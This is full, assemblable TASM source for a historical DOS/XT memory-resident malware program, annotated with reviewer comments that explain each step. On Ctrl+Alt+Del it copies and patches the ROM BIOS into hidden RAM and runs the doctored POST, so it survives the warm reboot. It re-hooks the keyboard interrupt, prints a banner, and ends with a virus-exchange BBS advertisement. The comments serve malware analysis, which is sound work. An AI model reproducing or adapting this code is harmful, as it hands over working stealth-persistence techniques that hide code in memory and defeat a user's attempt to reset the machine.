; Survive a warm reboot on an XT.
;
; Assemble with Turbo Assembler 2.5 (MASM/TASM syntax: .model, .radix,
; offset, word ptr, "?" -- the hosting site's "NASM" label is wrong).
; This program works on a generic IBM PC/XT.
;
; NOTE(review): historical DOS malware kept for analysis only. What the code
; below does, as far as it is visible here: it hooks INT 9 (keyboard) and,
; when Ctrl+Alt+Del is pressed, copies the 8 KiB ROM BIOS at F000:E000 into
; RAM 64 KiB below the top of conventional memory, patches that copy (what
; looks like the POST's top-of-memory compare, a stub spliced in after the
; interrupt-vector init loop, and the ROM checksum byte), copies itself into
; the same hidden segment and then executes the patched POST from RAM instead
; of letting the real warm boot run. The spliced stub later re-hooks INT 9,
; which is how the resident survives. Do not run outside an isolated VM.
.model tiny        ; single-segment .COM image: CS = DS = ES = SS
.radix 16          ; every numeric literal below is hexadecimal unless suffixed
.code
org 100            ; .COM entry point follows the 100h-byte PSP
start:
jmp init           ; the one-time installer lives at the end of the file
; INT 9 (keyboard hardware interrupt) hook, installed by init and re-installed
; by tmp_handler after each hijacked reboot.
; Reads the BIOS shift-state byte for Ctrl+Alt and the keyboard port for the
; Del make code; on Ctrl+Alt+Del control goes to now_fuck and never comes back
; to the interrupted program. Any other key is chained to the original INT 9
; through the far jump built from the bytes at oldvect. ds/ax are restored on
; the pass-through path.
handler:
push ds
push ax
xor ax,ax
mov ds,ax                 ; ds = 0000: BIOS data area and IVT
mov al,ds:[417]           ; 0040:0017 = keyboard shift flags
and al,0c                 ; keep bit 2 (Ctrl) and bit 3 (Alt)
cmp al,0c
jnz no_ctrl_alt           ; both must be held down
in al,[60]                ; scan code of the key that raised this IRQ
cmp al,53                 ; 53h = Del make code
jz now_fuck               ; Ctrl+Alt+Del: hijack the warm boot (ds/ax stay pushed)
no_ctrl_alt:
pop ax
pop ds
db 0ea                    ; opcode of JMP FAR ptr16:16 ...
oldvect dd ?              ; ... target = saved original INT 9 vector (written by init / tmp_handler)
; Reboot hijack. Entered from handler with the interrupted program's stack,
; ds = 0000 and ds/ax still pushed. Never returns: it ends with a RETF into the
; RAM copy of the POST, or with a real reset via cant_fuck when the ROM does
; not look the way this code expects.
now_fuck:
mov ds:[472],1234         ; 0040:0072 := 1234h, the BIOS reset flag (conventionally "warm boot")
mov ax,ds:[413]           ; 0040:0013 = conventional memory size in KiB
mov cx,6
shl ax,cl                 ; KiB -> paragraphs (x64): ax = segment just above usable RAM
push ax
mov es,ax
mov di,offset handler
push cs
pop ds
mov si,di
repz cmpsw                ; compare 12 bytes at cs:handler with es:handler ...
jnz new_move              ; ... to see whether a copy of this image already lives at that segment
mov dl,es:[top_seg]       ; it does: take the top-of-memory byte that copy saved ...
pop ax                    ; ... and keep using that same segment (no further 64 KiB taken)
jmp short set_segm
new_move:
mov al,ah                 ; ah = high byte of the top segment (A0h for 640 KiB)
cmp al,0a0
jnc set_top
mov al,0a0                ; dl := max(ah, A0h) -- presumably what the ROM's compare uses
set_top:
xchg ax,dx
pop ax
sub ax,1000               ; hide ourselves 64 KiB (1000h paragraphs) below the top of memory
set_segm:
mov cs:[top_seg],dl       ; remembered for protect_ram and for later re-entries here
push ax                   ; left on the stack: becomes CS for the final RETF
mov es,ax
mov di,0e000
mov ax,0f000
mov ds,ax
mov si,di
mov cx,1000
cld
rep movsw                 ; copy the 8 KiB BIOS ROM F000:E000..FFFF to <hidden seg>:E000
cmp byte ptr [si-10],0ea  ; si wrapped to 0: F000:FFF0 must hold the reset-vector JMP FAR (EAh) ...
jnz cant_fuck
cmp [si-0dh],0f000        ; ... whose segment is F000 ...
jnz cant_fuck
mov di,[si-0f]            ; ... and whose offset is the POST entry point
cmp di,0e000
jc cant_fuck              ; the entry must lie inside the copied 8 KiB window
mov al,[di]
cmp al,0e9
jnz no_jmp
add di,[di+1]             ; entry starts with JMP NEAR rel16: follow it
add di,3
no_jmp:
push di                   ; POST entry offset: becomes IP for the final RETF
mov cx,800                ; scan budget (800h bytes); es:di and cx carry over from protect_ram into replace_ints
call protect_ram          ; patch the copy's top-of-memory compare so the POST leaves our segment alone
call replace_ints         ; splice my_piece into the copy right after its vector init loop
push es
pop ds
mov bx,0e000
mov cx,2000
xor al,al
check_lup:
add al,[bx]               ; byte-sum the patched 8 KiB copy ...
inc bx
loop check_lup
neg al
mov [di-1],al             ; ... and park the fix-up in my_piece's spare byte so the sum is 0 (di was left past the stub)
push cs
pop ds
mov word ptr ds:[tmp_handler],5ebh   ; bytes EB 05: turn "jmp $" into "jmp short +5", skipping go_old
mov si,offset start
mov di,si
mov cx,init-start
rep movsb                 ; copy this resident image (start..init) to <hidden seg>:0100
retf                      ; "reboot": jump to <hidden seg>:<POST entry>, i.e. run the patched BIOS from RAM
; Bail-out when the copied BIOS does not match the expected patterns, also
; reached from protect_ram / replace_ints when their scan budget (cx) hits 0.
; Does a real reset by far-jumping to the CPU reset vector FFFF:0000; whatever
; was pushed on the stack is simply abandoned.
cant_fuck:
db 0ea                    ; JMP FAR ...
dw 0                      ; ... offset 0000
dw 0ffff                  ; ... segment FFFF
; Locate, inside the BIOS copy, what looks like the POST's top-of-memory
; compare and lower its immediate so the memory test stops below our segment.
; In:  es:di = scan position in the BIOS copy, cx = remaining scan bytes,
;      ds = F000 (the real ROM; identical content at this point),
;      dl = expected top-of-memory high byte (from top_seg).
; Out: es:[di+1] patched, di just past the match, cx reduced.
;      Jumps to cant_fuck (never returns) if no match within cx bytes.
; Pattern: 80h, modrm F8h..FFh, imm8 == dl -- an 8086 "cmp r8, imm8"
; (80 /7, mod=11) whose immediate is the top-of-memory byte (presumably A0h).
protect_ram:
jcxz cant_fuck            ; scan budget exhausted
mov al,80
repnz scasb               ; find opcode 80h (group-1 r/m8, imm8)
jnz protect_ram           ; not found: cx is now 0 and the jcxz above bails out
mov ax,[di]               ; al = modrm, ah = imm8 (read from the ROM via ds)
and al,0f8
cmp al,0f8                ; modrm 11 111 rrr -> reg field 7 = CMP, register operand
jnz protect_ram
cmp ah,dl                 ; immediate must be the top-of-memory byte we expect
jnz protect_ram
mov ax,es
mov es:[di+1],ah          ; rewrite the immediate in the copy to our hidden segment's high byte
ret
top_seg db ?              ; high byte of the original top-of-memory segment (set in now_fuck)
; Locate, inside the BIOS copy, the POST's interrupt-vector init loop and
; overwrite the code that follows it with my_piece.
; In:  es:di, cx as left by protect_ram; ds = F000 (reads come from the ROM,
;      writes go to the copy).
; Out: my_piece copied to es:di, di left just past it (now_fuck uses di-1 for
;      the checksum fix-up); [dummy] = offset just after the loop, so the stub
;      can far-jump back into the real ROM there; ds = cs.
;      Jumps to cant_fuck if the pattern is not found within cx bytes.
; Pattern: A5 (MOVSW) 47 47 (INC DI; INC DI) E2 FB (LOOP $-5): copies one word
; and skips the next -- presumably the IVT offset-table copy of the XT POST.
replace_ints:
jcxz cant_fuck            ; scan budget exhausted
mov al,0a5
repnz scasb               ; find opcode A5h = MOVSW
jnz replace_ints
cmp [di],4747             ; INC DI ; INC DI
jnz replace_ints
cmp [di+2],0fbe2          ; LOOP rel8 = -5 (bytes E2 FB)
jnz replace_ints
add di,4                  ; di -> first byte after the loop
push cs
pop ds
mov [dummy],di            ; resume point in the real ROM (target of my_piece's JMP FAR F000:dummy)
mov si,offset my_piece
mov cx,my_top-my_piece
rep movsb                 ; overwrite the copy's code after the loop with the stub (that code is never run from the copy)
exit_prn:                 ; shared return: also the exit of print_msg below
ret
; Stub spliced into the BIOS copy right after its vector-init loop (see
; replace_ints). It is copied as raw bytes and executes with CS = hidden
; segment as part of the RAM POST; its absolute offsets (tmp_handler, old_tmp)
; resolve because now_fuck copies the whole image to <hidden seg>:0100 at its
; original offsets.
; Assumes es = 0000 (the IVT) at that point in the POST -- not set here,
; TODO confirm against the XT ROM.
my_piece:
push ax
mov cx,20                 ; 20h = 32 vectors, INT 00h..1Fh
xor di,di
re_init:
scasw                     ; skip the offset word
mov ax,0f000
stosw                     ; segment word := F000 (vector points into the real ROM)
loop re_init              ; di = 80h afterwards
mov ax,offset tmp_handler
xchg ax,es:[di+44-80]     ; 0000:0044 = INT 11h offset := tmp_handler, old value -> ax
mov cs:[old_tmp],ax
mov ax,cs
xchg ax,es:[di+46-80]     ; 0000:0046 = INT 11h segment := our hidden segment
mov cs:[old_tmp+2],ax
pop ax
db 0ea                    ; JMP FAR ...
dummy dw ?                ; ... offset just past the ROM's vector loop (filled in by replace_ints)
dw 0f000                  ; ... in the real ROM: the rest of the POST runs from ROM
db 0                      ; spare byte: now_fuck writes the checksum fix-up here
my_top:
; Print the '$'-terminated string at message with BIOS teletype output
; (INT 10h, AH=0Eh). Assumes ds = cs (both callers set it). Clobbers ax, si;
; bh (display page) is not set here. Returns through exit_prn, the ret at the
; end of replace_ints.
print:
mov si,offset message
print_msg:
lodsb
cmp al,'$'
jz exit_prn               ; terminator reached: return
mov ah,0e
int 10                    ; teletype output of al
jmp print_msg
; INT 11h (equipment list) hook that my_piece installs during the RAM POST.
; Self-modifying: its first two bytes go through three states:
;   EB FE  "jmp $"         as assembled (never executed in this state);
;   EB 05  "jmp short +5"  written by now_fuck before the image is copied:
;                          skips go_old and runs the one-time re-arm code;
;   90 90  "nop; nop"      written by that code after its first run: every
;                          later INT 11h falls straight into go_old.
tmp_handler:
jmp $
go_old:
db 0ea                    ; JMP FAR to the original INT 11h handler ...
old_tmp dw ?              ; ... offset (saved by my_piece)
dw ?                      ; ... segment
; One-time re-arm: put handler back on INT 9 (presumably reset by the POST),
; then disarm this hook and chain to the original INT 11h.
push ds
push si                   ; si is clobbered by print
push ax
xor ax,ax
mov ds,ax                 ; ds = 0000: IVT
mov ax,offset handler
xchg ax,ds:[24]           ; INT 9 offset := handler, old value -> ax
mov word ptr cs:[oldvect],ax
mov ax,cs
xchg ax,ds:[26]           ; INT 9 segment := our (hidden) segment
mov word ptr cs:[oldvect+2],ax
push cs
pop ds
mov word ptr [tmp_handler],9090   ; disarm: next INT 11h goes straight to go_old
call print                ; announce ourselves
pop ax
pop si
pop ds
jmp go_old                ; chain to the original INT 11h
message:                  ; banner printed by print: text, CR, LF, '$' terminator
db 'Never ending story...',0dh,0a,'$'
; One-time installer (the .COM entry jumps here). Saves the current INT 9
; vector into oldvect, points INT 9 at handler, prints the banner and goes
; resident with INT 27h, keeping everything from the PSP up to init.
init:
mov ax,3509               ; DOS: AH=35h get interrupt vector, AL=09h
int 21                    ; -> es:bx = current INT 9 handler
mov word ptr [oldvect],bx
mov word ptr [oldvect+2],es
mov dx,offset handler
mov ah,25                 ; DOS: AH=25h set interrupt vector, AL still 09h, ds:dx = handler
int 21
call print
mov dx,offset init        ; bytes to keep resident: PSP + code up to init
int 27                    ; terminate and stay resident
end start

; ===========================================================================
; >> and Remember Don't Forget to Call <<
; >> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<
; ===========================================================================